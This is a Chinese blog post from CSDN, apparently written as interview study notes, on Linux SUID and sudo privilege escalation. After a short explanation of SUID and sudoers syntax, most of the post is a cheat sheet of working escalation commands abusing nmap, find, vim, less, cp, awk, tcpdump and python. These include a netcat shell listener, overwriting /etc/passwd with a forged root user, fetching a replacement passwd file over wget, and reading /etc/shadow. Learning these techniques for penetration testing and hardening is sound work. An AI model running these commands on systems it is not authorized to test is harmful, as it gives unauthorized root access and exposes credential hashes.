Linux SUID 提权

最新推荐文章于 2024-02-21 18:04:41 发布
最新推荐文章于 2024-02-21 18:04:41 发布
阅读量4.8k 收藏 2
点赞数
分类专栏: Linux Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39293438/article/details/104094194
版权
Web 同时被 2 个专栏收录
30 篇文章 1 订阅
订阅专栏
Linux
1 篇文章 0 订阅
订阅专栏

0x00 前言

面试时发现关于 SUID 并不是很清楚,所以学习记录下

0x01 关于 SUID

SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。

那么,为什么要给Linux二进制文件设置这种权限呢?其实原因有很多,例如,程序ping需要root权限才能打开网络套接字,但执行该程序的用户通常都是由普通用户,来验证与其他主机的连通性。

但是,如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。

passwd 的权限:

用户可以输入自己的密码或者不需要密码在root权限下执行命令,这可在设置文件 /etc/sudoers 中配置。

1.1 /etc/sudoers 语法

root ALL=(ALL) ALL

root 用户可以从 ALL(任何)终端执行,充当ALL(任何)用户,并运行ALL(任何)命令。第一部分指定用户,第二部分指定可充当用户,第三部分指定 sudo 可运行的命令。

touhid ALL= /sbin/poweroff

输入 touchid 的密码,可以 sudo 执行 poweroff 命令。

touhid ALL = (root) NOPASSWD: /usr/bin/find

不输入密码,可以 sudo 执行 find 命令

1.2 查找具有 SUID 权限位文件

以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

也可以使用 sudo -l 命令列出当前用户可执行的命令

0x02 常用提权方式

2.1 nmap

nmap(2.02-5.21)存在交换模式,可利用提权

nmap --interactive

之后执行:

nmap> !sh
sh-3.2# whoami
root

msf中的模块为:

exploit/unix/local/setuid_nmap

较新版可使用 --script 参数:

echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

kali nmap 7.7 提权成功:

2.2 find

touch test
find test -exec whoami \;

nc 反弹 shell:

find test -exec netcat -lvp 5555 -e /bin/sh \;

2.3 vi/vim

打开vim,按下ESC

:set shell=/bin/sh
:shell

或者

sudo vim -c '!sh'

2.4 bash

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

2.5 less

less /etc/passwd
!/bin/sh

2.6 more

more /home/pelle/myfile
!/bin/bash

2.7 cp

覆盖 /etc/shadow/etc/passwd

[zabbix@localhost ~]$ cat /etc/passwd >passwd
2.[zabbix@localhost ~]$ openssl passwd -1 -salt hack hack123
3.$1$hack$WTn0dk2QjNeKfl.DHOUue0
4.[zabbix@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd
5.[zabbix@localhost ~]$ cp passwd /etc/passwd
6.[zabbix@localhost ~]$ su - hack
7.Password:
8.[root@361way ~]# id
9.uid=0(hack) gid=0(root) groups=0(root)
10.[root@361way ~]# cat /etc/passwd|tail -1
11.hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash

2.8 mv

覆盖 /etc/shadow/etc/passwd

2.9 nano

nano  /etc/passwd

2.10 awk

awk 'BEGIN {system("/bin/sh")}'

2.11 man

man passwd
!/bin/bash

2.12 wget

wget http://192.168.56.1:8080/passwd -O /etc/passwd

2.13 apache

仅可查看文件,不能弹 shell:

apache2 -f /etc/shadow

2.14 tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

2.15 python/perl/ruby/lua/php/etc

python

python -c "import os;os.system('/bin/bash')"

perl

exec "/bin/bash";

参考链接

柠檬木有枝qwq
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux使用suid vim.basic文件实现提权
09-14
主要介绍了Linux使用suid vim.basic文件实现提权,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
SUID提权
一只web狗
07-01 1万+
SUID提权介绍
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
Fengg--Focus Oracle
06-29 7239
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 RHEL5-RHEL6下面都可以实现,root的UID是零 创建一个普通用户 useradd andy 切换到andy用户 su - andy 查看当前用户是谁 whoami 查看tmp目录权限 [andy@bogon tmp]$ ll -d /tmp drwx
[VulnHub靶机渗透] 常用的linux提权方法——脏牛提权 dirty.c
最新发布
人若无名,便可专心练剑
02-21 822
脏牛(Dirty COW)是一个 Linux 内核漏洞,其全名为 “Copy-On-Write”。该漏洞在 2016 年首次公开,并且被广泛用于 Linux 系统上的提权攻击。脏牛漏洞允许攻击者利用内核中对于 “Copy-On-Write” 内存管理的一个缺陷来获取 root 权限。
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 5307
Linux提权姿势汇总
Linux Suid提权
YouthBelief的博客
12-21 674
Suid提权 原理 SUID(设置用户ID)是一种权限类型,它被赋予一个文件,允许用户以其所有者的权限执行该文件。Linux二进制文件可以拥有这种类型的权限集有很多原因。例如,ping实用程序需要root权限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 权限,则它们可用于将权限提升为 root。 suid权限 表示 chmod u+s 如下 二进制文件以 root 权限执行,因为它们的权限中包含“ s ”,并且它们归 roo
LinuxSUID提权
Zlirving_的博客
08-25 736
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root   0x01 suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的:(三种都可以) find / -perm -u=s -type f 2>/
Linux提权手法总结以及 Linux提权exp集合
02-22
Linux常见提权总结包括(内核漏洞提权suid提权、定时任务提权、sudo提权等等)
linux提权总结8大类型,30多种方式
09-27
linux提权总结8大类型,30多种方式 小白也能看明白的提权方法,包括内核提权,服务提权 sudo提权 suid提权sgid提权 定时任务提权 nfs提权 等待
linux suid权限维持速查表1
08-03
linux suid权限维持速查表linux suid 权限维持速查表赋权姿势:linux suid权限维持速查表linux suid权限维持速查表linux
Linux权限提升】sudo漏洞提权&SUID提权(一)
一剑开天门!的博客
02-24 2179
Linux权限提升】sudo命令提权&SUID提权(一)
Linux通过第三方应用提权实战总结
zhangge3663的博客
02-20 1508
Linux提权,前提是拿到了一个低权限的账号,能上传和下载文件,主要思路有: 1、内核提权。网上各种大佬的payload很多,关键在于要能找到利用哪个exp以及具体如何利用。省力点的方法是用searchsploit或者linux-exploit-suggester.sh来查找,熟悉之后难度也不大。 2、suid提权。这里也包含了sudo这种方式,两种方法的思路都是一样的,区别在于suid针对单个程序,sudo针对某个用户。这类提权方式的主要思路是:管理员授权普通用户去执行 root 权限的操作,而不需要
Linux被曝出SUDO提权漏洞,幸好影响不大
NOSEC2019的博客
10-15 2373
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root权限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
Linux提权————利用SUID提权
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
Linux下利用SUID提权
Ms08067安全实验室
03-16 3082
今天给大家带来的是linux下的提权技巧。SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥...
Linux提权Suid提权 小部分归纳
weixin_51339377的博客
04-08 1269
Linux提权Suid提权 SUIDlinux的一种权限机制 具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权 已知的可用于提权linux可行性文件列表如下: Nmap Vim find Bash More Less Nano cp 使用如下命令可以发现系统上运行的所有SUID可执行的文件 命令将查找具有root权限的SUID的文件 find /...
Basic Linux Privilege Escalation
公众号shadow sock7
09-17 1324
原文链接: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Basic Linux Privilege Escalation Before starting, I would like to point out - I'm no expert. As far as I kno
Linux提权suid
weixin_43995499的博客
03-01 1828
Linux提权suid篇 不知攻,焉知防 一个在安服路上摸索的大三生,记录平时学习笔记 suid前言: 1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义. 2.命令执行者要对该程序文件拥有执行(x)权限. 3.命令执行者在执行该程序时获得该程序文件属主的身份. 4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效 实验环境: kali 靶机账号 :muhammad 密码 : nasef START: 靶机自带提权文件suid
Linux下用SUID提权
热门推荐
谢公子的博客
12-07 2万+
关于SUID详细:Linux下的用户、组和权限 SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统上运行...
linux suid提权
03-16
SUID是一种特殊的权限位,当一个可执行文件被设置了SUID位后,它在执行时就会以文件所有者的权限来执行,而不是以执行者的权限来...为了防止SUID提权攻击,管理员应该定期检查系统中的SUID文件,并限制它们的使用权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值